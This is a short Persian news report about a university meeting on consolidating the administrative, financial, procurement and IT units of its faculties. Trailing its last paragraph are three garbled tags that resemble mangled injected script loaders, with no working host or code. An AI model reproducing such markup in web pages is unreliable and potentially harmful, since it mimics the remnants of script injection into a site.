سومین جلسه تجمیع واحدهای اداری – مالی دانشکده های تابعه دانشگاه در دفتر معاونت توسعه مدیریت و منابع دانشگاه برگزار شد

در این جلسه که با حضور معاون توسعه مدیریت و منابع ، معاونین اداری و مالی دانشکده ها ، مدیر منابع انسانی ، مدیر امورمالی و مدیرآمار و فناوری اطلاعات دانشگاه برگزار گردید . فرایند تجمیع واحدهای اداری، مالی، انبارداری، کارپردازی و IT  طرح و مورد بحث و بررسی قرار گرفت.

معاون توسعه مدیریت و منابع دانشگاه با اشاره به لزوم حمایت و نظارت مستقیم مدیران مالی، منابع انسانی دانشگاه و معاونین اداری مالی بر اجرای فرایند تجمیع، تاکید نمودند اجرای این برنامه نتایج اثر بخشی را در دانشکده ها خواهد داشت . ایشان همچنین افزودند اجرای برنامه تجمیع نه تنها منافع افراد و مجریان را تحت تاثیر قرار نخواهد داد بلکه موجب مدیریت بهینه امور مالی و اداری در دانشکده ها خواهد شد.

در ادامه معاونین اداری و مالی دانشکده ها نقطه نظرات و پیشنهادات خود را مطرح و جمع بندی نهایی جهت اجرای برنامه انجام پذیرفت.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *